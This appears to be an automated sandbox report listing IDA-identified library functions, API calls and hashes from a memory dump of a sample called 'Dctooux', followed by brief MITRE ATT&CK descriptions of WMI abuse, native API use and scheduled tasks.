Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: c7e9ce309fc5e9c1199c1a2ca4fd8f06b63f0a825f6697bcfa0b8d8c765b8334
Instruction ID: a2892396194607a8082cd9b09fde86ba708b8e439ba8d1c5571ea3df0e8b19e8
Opcode Fuzzy Hash: c7e9ce309fc5e9c1199c1a2ca4fd8f06b63f0a825f6697bcfa0b8d8c765b8334
Instruction Fuzzy Hash: A42192B6901214AFDB05EF64DD96ADEB7B4AF05310F50C02AF419AB152DB716E41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A8BA51 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00A87D9A,?,?,?,?,00A889CE,?), ref: 00A8BA56
_free.LIBCMT ref: 00A8BAB3
_free.LIBCMT ref: 00A8BAE9
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00A87D9A,?,?,?,?,00A889CE,?), ref: 00A8BAF4

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: c869c96d83ce904608ada2645bc7c58a7988d580b25c5009f6ff03ff79143dc7
Instruction ID: f9776326f615c124d3429e5eee04bda02ed36d88c2140bdce2fe809ee8538d93
Opcode Fuzzy Hash: c869c96d83ce904608ada2645bc7c58a7988d580b25c5009f6ff03ff79143dc7
Instruction Fuzzy Hash: 9E110272664601ABC615B7BC6C89F3B655DDBC17B4B640325F620921E3EF318C024B30

Uniqueness

Uniqueness Score: -1.00%

Function 00A8277F Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00A82813
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00A827C4

Part of subcall function 00A7976B: SafeRWList.LIBCONCRT ref: 00A7977C

SafeRWList.LIBCONCRT ref: 00A82809
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00A82829

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 336577199-0
Opcode ID: 3555bc96c2f3013733920988c76efab3b086f2555da5ca6455333600e6ec5598
Instruction ID: 33dcb0f97a36124d320123974588e9048ecf9abda391b8a039de5e5e50c431b8
Opcode Fuzzy Hash: 3555bc96c2f3013733920988c76efab3b086f2555da5ca6455333600e6ec5598
Instruction Fuzzy Hash: 7621FF7161020ADFCB04EF20C981FA5FBE9BB91718F10C2A6D4094B142D731E98ACBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00A8BBA8 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00A88968,00A52147), ref: 00A8BBAD
_free.LIBCMT ref: 00A8BC0A
_free.LIBCMT ref: 00A8BC40
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00A88968,00A52147), ref: 00A8BC4B

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: fa2a5c2508772e9ad8104624d4830b0c2deb7728a40e75b140b37debd700135c
Instruction ID: dfd31e068ca3f058961021ea56fef9c1315ebc9e2e32352d846f3e1cc8fc09b6
Opcode Fuzzy Hash: fa2a5c2508772e9ad8104624d4830b0c2deb7728a40e75b140b37debd700135c
Instruction Fuzzy Hash: 6D1104B2650A016AD61177BCADC9F2A256DEBC5770F680335F614861E3EF358C035B30

Uniqueness

Uniqueness Score: -1.00%

Function 00A7073D Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00A7075F

Part of subcall function 00A7091B: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00A768D6

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00A70780

Part of subcall function 00A71602: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00A7161E

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 00A7079C
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 00A707A3

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: b91ea3925590b6eae762afa4493db409b9b97c73bbecb3d2c927dee73d9c3df6
Instruction ID: d32c5c877f25d6c70f1e680270d21a067ee8b02fcf29d8e040850855d2c1ee69
Opcode Fuzzy Hash: b91ea3925590b6eae762afa4493db409b9b97c73bbecb3d2c927dee73d9c3df6
Instruction Fuzzy Hash: 9D01D2B1500705FFD724BF69CD82D9BBBACEF10750B10C92AF59D92182D770E9408BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A8480E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00A84828
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00A8483C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00A84854
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A8486C

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: fa95a5806751b91b36ad74ccb42e8dabeca3dddc03d3e13b0140b6c72440d92f
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: AF01F432700616ABCF16BFA5C951AEF77ADEF98350F004015FD16AB282DA31ED0497E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A8CB95 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,00A8CC91,00000000,?,00A93316,00000000,00000000,00A8CC91,?,?,00000000,00000000,00000001), ref: 00A8CBAB
GetLastError.KERNEL32(?,00A93316,00000000,00000000,00A8CC91,?,?,00000000,00000000,00000001,00000000,00000000,?,00A8CC91,00000000,00000104), ref: 00A8CBB5
__dosmaperr.LIBCMT ref: 00A8CBBC

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 13413b907cb5ff1fcf9b390a8c628153e4f58bfb0f51f2531c7a0cb7c06fc403
Instruction ID: 5e855083e4e72b8b62e7e04bbf431007adfaf2ad14968cc5cd0128c3bda9b2fd
Opcode Fuzzy Hash: 13413b907cb5ff1fcf9b390a8c628153e4f58bfb0f51f2531c7a0cb7c06fc403
Instruction Fuzzy Hash: 87F01D32600516BBCB207BA6DC09D5AFF69EF457B03158525F629D7520CB31E861DFE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A8CB2C Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,00A8CC91,00000000,?,00A9338B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00A8CB42
GetLastError.KERNEL32(?,00A9338B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00A8CC91,00000000,00000104,?), ref: 00A8CB4C
__dosmaperr.LIBCMT ref: 00A8CB53

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 164215e3624c9282ba15ae14d3cef71c3aceae536d96677df9df1d6ff65c8467
Instruction ID: db1637296d98566a471f6b3e5ed86a58376d5312198623c10a8bb89c639fe903
Opcode Fuzzy Hash: 164215e3624c9282ba15ae14d3cef71c3aceae536d96677df9df1d6ff65c8467
Instruction Fuzzy Hash: 31F04632600516BBCB20ABAAD809D6AFF69EE457B03058125F528D7420CB31E861DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A76455 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A713B6: TlsGetValue.KERNEL32(?,?,00A70937,00A70764,?,?), ref: 00A713BC

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 00A7647F

Part of subcall function 00A7F75E: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00A7F785
Part of subcall function 00A7F75E: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00A7F79E
Part of subcall function 00A7F75E: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00A7F814
Part of subcall function 00A7F75E: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00A7F81C

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00A7648D
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00A76497
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00A764A1

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: d583035bac95d5f43ab1790af8271273af087589af57a99ce3bbedf3c84ec2bb
Instruction ID: 3572eb38f50ced6950d4c25c4eb0c915793c818c8e960edc830bf2914894ef0b
Opcode Fuzzy Hash: d583035bac95d5f43ab1790af8271273af087589af57a99ce3bbedf3c84ec2bb
Instruction Fuzzy Hash: 85F0F031A009142BCA25B3688E129AEB769AF90B50F04C12AF52D53693DF289E0587C1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A960 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00A7A969

Part of subcall function 00A7091B: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00A768D6

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 00A7A98D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00A7A9A0
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00A7A9A9

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction ID: 62e0e21671e08c325c4803c6b10e8e6003646155372965c6b35703523eebae33
Opcode Fuzzy Hash: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction Fuzzy Hash: E0F0E530200A20AFE625AB288D11F7F23D59FD0312F01C41EE65F97282CE24E843CB53

Uniqueness

Uniqueness Score: -1.00%

Function 00A6E5EE Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,00A6E58B,00000064), ref: 00A6E611
LeaveCriticalSection.KERNEL32(00AB8640,00AB9578,?,00A6E58B,00000064,?,74DF0F00,?,00A57A3D,00AB9578), ref: 00A6E61B
WaitForSingleObjectEx.KERNEL32(00AB9578,00000000,?,00A6E58B,00000064,?,74DF0F00,?,00A57A3D,00AB9578), ref: 00A6E62C
EnterCriticalSection.KERNEL32(00AB8640,?,00A6E58B,00000064,?,74DF0F00,?,00A57A3D,00AB9578), ref: 00A6E633

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: df10e8df609dbd60182a5cf621def53fe55691d1f75a272b87a0e6754f2cdc39
Instruction ID: 7fb6ba6f02aac8f23ea2c2a4be71a384f2fc5baa2c97c77aeef86a196233978b
Opcode Fuzzy Hash: df10e8df609dbd60182a5cf621def53fe55691d1f75a272b87a0e6754f2cdc39
Instruction Fuzzy Hash: CFE06D36501124B7CA029FDDEC18BCD3B3CAB0AB51B040110FA05561B1DB655812DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 00A7041D Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 00A70421

Part of subcall function 00A70DB8: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00A70DD9
Part of subcall function 00A70DB8: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00A70E10
Part of subcall function 00A70DB8: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00A70E1C

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00A7042D

Part of subcall function 00A7085F: Concurrency::critical_section::unlock.LIBCMT ref: 00A70883

Concurrency::Context::Block.LIBCONCRT ref: 00A70432

Part of subcall function 00A717B6: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00A717B8

Concurrency::critical_section::lock.LIBCONCRT ref: 00A70452

Part of subcall function 00A70CE1: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00A70CFC
Part of subcall function 00A70CE1: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00A70D07

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockNodeNode::Queue$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 811866635-0
Opcode ID: ab36ed380a16e0c45a6e863695ab03824b456cf78d7fd97dfc82880f34110f4a
Instruction ID: d07f30f3a0832b7f1a8a3047493b9774be14cd47ca2a3a3acb3ffdac43d5a682
Opcode Fuzzy Hash: ab36ed380a16e0c45a6e863695ab03824b456cf78d7fd97dfc82880f34110f4a
Instruction Fuzzy Hash: 40E0DF34600205DBCF0AFB24CA919ACBB61BF48310B00C308E46A0B2E2CF346D06CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A6CA26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00A6CAAE
RaiseException.KERNEL32(?,?,?,?), ref: 00A6CAD3

Part of subcall function 00A84F51: RaiseException.KERNEL32(E06D7363,00000001,00000003,00AB1300,?,?,?,00AB1300), ref: 00A84FB1

Part of subcall function 00A89FCF: IsProcessorFeaturePresent.KERNEL32(00000017,00A8BB0D,?,?,00A87D9A,?,?,?,?,00A889CE,?), ref: 00A89FEB

Strings

csm, xrefs: 00A6CA62

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: ba60d7cf614f275980f8c9f5f1f71a485fc448b05b443d5fe0839314c90945b2
Instruction ID: a87e3c9eea8517059c4163636d8f1b3392faace6c7be1d1c43c0e3b276132562
Opcode Fuzzy Hash: ba60d7cf614f275980f8c9f5f1f71a485fc448b05b443d5fe0839314c90945b2
Instruction Fuzzy Hash: 79217F32D0021CAFCF24DFE4D955ABEB7BAEF24760F584409E546AB250CB30AD45DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A7491C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A7494C

Strings

pScheduler, xrefs: 00A74944
version, xrefs: 00A74931

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: a3e31c4ac8dbff78d00c9ecd67aa44c0f3024e881534a138c1ac55ade6fdfc8a
Instruction ID: 7adece41756a607bfad927d484e01b949b0d0fd98a350ce57a91aad25cca1281
Opcode Fuzzy Hash: a3e31c4ac8dbff78d00c9ecd67aa44c0f3024e881534a138c1ac55ade6fdfc8a
Instruction Fuzzy Hash: DBE08631940208B6CF14FB54DD0ABDE7778AB29744F10C425B519130D5D7B8D688CA91

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

